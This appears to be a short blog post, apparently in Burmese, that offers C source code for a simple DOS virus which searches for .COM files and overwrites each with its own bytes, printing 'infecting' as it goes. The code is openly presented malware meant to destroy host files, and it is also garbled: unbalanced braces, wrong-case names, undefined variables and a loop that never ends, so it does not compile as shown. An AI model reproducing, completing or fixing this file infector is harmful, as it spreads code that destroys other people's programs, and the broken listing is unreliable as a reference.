Virus Source Codeေလးပါ.......
File*Virus, *Host; int x,y,done; char buff[256] struct ffblk ffblk; main() { done=(findfirst("*.COM",&ffblk,0); while(!done) { Printf(infecting %s\n",ffblk.ff_name); virus=fopen(_arg[0],"rb"); Host=fopen(ffblk.ff_name,"rb+"); x=9504; while(x>256) } fread(buff,x,1,virus); fwrite(buff,x,1,host); fcloseall(); done=findnext(&ffblk); } return(0); }
0 comments:
Post a Comment